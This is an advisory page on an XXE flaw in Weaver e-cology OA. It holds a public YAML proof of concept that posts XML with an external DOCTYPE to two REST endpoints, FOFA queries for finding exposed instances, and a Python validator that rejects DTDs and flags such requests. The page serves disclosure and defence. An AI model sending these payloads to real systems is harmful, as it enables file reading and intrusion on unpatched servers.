ecology-oa-deleteuserrequestinfobyxml-xxe: 泛微 (Weaver) OA deleteUserRequestInfoByXml XXE

Date: 2025-09-01 | Affected software: 泛微OA (Weaver OA) | PoC: public

Vulnerability description

A function in 泛微 e-cology originally filtered user input incompletely, so that processing that input could trigger an XXE. The fix rule that followed can still be bypassed; this vulnerability is the bypass of that earlier fix rule. An attacker can use it to list directories, read files, and possibly obtain administrator privileges on the application system.

Affected versions: e-cology 9.x incremental patch version < 10.58.1
FOFA: app="泛微-协同商务系统"
FOFA: app="泛微-协同办公OA"

PoC code [public]

id: ecology-oa-deleteuserrequestinfobyxml-xxe

info:
  name: 泛微 OA deleteUserRequestInfoByXml XXE
  author: xpoc
  severity: high
  verified: true
  description: |
    泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
    e-cology 9.x 增量补丁版本 < 10.58.1
    FOFA: app="泛微-协同商务系统"
    FOFA: app="泛微-协同办公OA"
  solutions: 安装增量补丁10.58.1,使用10.58.1全量补丁修复无效。
  reference:
    - https://mp.weixin.qq.com/s/YT64vy3tbAoxj6CQ7XWgUA
    - https://mp.weixin.qq.com/s/nqGZL2Ny6m9wrNqlWqu4-Q
    - https://mp.weixin.qq.com/s/6p7-R5_VOeDUUobMuqYGcA
    - https://stack.chaitin.com/tool/detail?id=1036
  tags: ecology,oa,xxe
  created: 2023/07/12

set:
  oob: oob()
  oobHTTP: oob.HTTP
rules:
  r0:
    request:
      method: POST
      path: /rest/ofs/deleteUserRequestInfoByXml
      headers:
        Content-Type: application/xml
      body: |
        <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE syscode SYSTEM "{{oobHTTP}}">
        <M><syscode>&send;</syscode></M>
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
  r1:
    request:
      method: POST
      path: /rest/ofs/ReceiveCCRequestByXml
      headers:
        Content-Type: application/xml
      body: |
        <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE syscode SYSTEM "{{oobHTTP}}">
        <M><syscode>&send;</syscode></M>
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0() || r1()
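The description above notes that the vendor's first fix was an input-filtering rule that could be bypassed, and the PoC shows the request shape: a POST of XML with a DOCTYPE whose SYSTEM identifier points at an out-of-band server. The durable mitigation is to refuse DTDs at the parser, not to pattern-match the body. The following is an added example (not code from the page, from xray/chaitin, or from 泛微); it uses Python's standard-library expat parser to reject any DOCTYPE before an entity can be declared, and uses the same check to flag requests to the two endpoints named in the PoC. The request records, the hostname oob.example.invalid and the path /index.html are constructed sample data, and the Request class and function names are this example's own.

```python
import xml.parsers.expat
from dataclasses import dataclass

# The two endpoints from the PoC that accept attacker-controlled XML.
XML_ENDPOINTS = {
    "/rest/ofs/deleteUserRequestInfoByXml",
    "/rest/ofs/ReceiveCCRequestByXml",
}


class DtdNotAllowed(ValueError):
    """Raised when an XML document declares a DOCTYPE (DTD)."""


def parse_xml_without_dtd(body: bytes) -> dict:
    """Parse a small XML document with expat, refusing any DOCTYPE.

    Rejecting the DTD outright removes the whole external-entity class
    (SYSTEM/PUBLIC identifiers, internal subsets, entity expansion), so
    no keyword filter on the request body is needed.  Returns a toy
    {element_name: text} map of the leaf elements that carried text.
    """
    parser = xml.parsers.expat.ParserCreate()
    leaves: dict = {}
    text_parts: list = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires as soon as <!DOCTYPE ...> is seen, before any entity use.
        raise DtdNotAllowed(f"DOCTYPE {name!r} not permitted (SYSTEM={sysid!r})")

    def on_start(name, attrs):
        text_parts.clear()

    def on_chars(data):
        text_parts.append(data)

    def on_end(name):
        text = "".join(text_parts).strip()
        if text:
            leaves[name] = text
        text_parts.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(body, True)  # exceptions raised in handlers propagate here
    return leaves


@dataclass
class Request:
    method: str
    path: str
    content_type: str
    body: bytes


def is_suspicious_xml_request(req: Request) -> bool:
    """Flag a POST to one of the PoC endpoints whose body declares a DOCTYPE."""
    if req.method != "POST" or req.path not in XML_ENDPOINTS:
        return False
    try:
        parse_xml_without_dtd(req.body)
    except DtdNotAllowed:
        return True
    except xml.parsers.expat.ExpatError:
        return False  # malformed XML without a DOCTYPE: not a DTD-based payload
    return False


# Constructed sample requests (not captured traffic): a benign document,
# one shaped like the PoC body, and an unrelated GET.
SAMPLE_REQUESTS = [
    Request("POST", "/rest/ofs/deleteUserRequestInfoByXml", "application/xml",
            b'<?xml version="1.0" encoding="utf-8"?><M><syscode>ABC123</syscode></M>'),
    Request("POST", "/rest/ofs/ReceiveCCRequestByXml", "application/xml",
            b'<?xml version="1.0" encoding="utf-8"?>'
            b'<!DOCTYPE syscode SYSTEM "http://oob.example.invalid/x">'
            b'<M><syscode>&send;</syscode></M>'),
    Request("GET", "/index.html", "", b""),
]


def flagged_paths(requests=SAMPLE_REQUESTS) -> list:
    """Return the paths of requests that the DOCTYPE check flags."""
    return [r.path for r in requests if is_suspicious_xml_request(r)]


if __name__ == "__main__":
    print(flagged_paths())
    print(parse_xml_without_dtd(SAMPLE_REQUESTS[0].body))
```

Because the DOCTYPE handler raises before expat reaches the entity reference, the external SYSTEM identifier is never resolved and the undefined `&send;` entity is never evaluated; the same parser accepts the benign document and returns its `syscode` value. In the e-cology application itself the equivalent setting is to disallow DTDs on the Java XML parser in use, which the vendor's incremental patch 10.58.1 named in `solutions` is expected to address.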
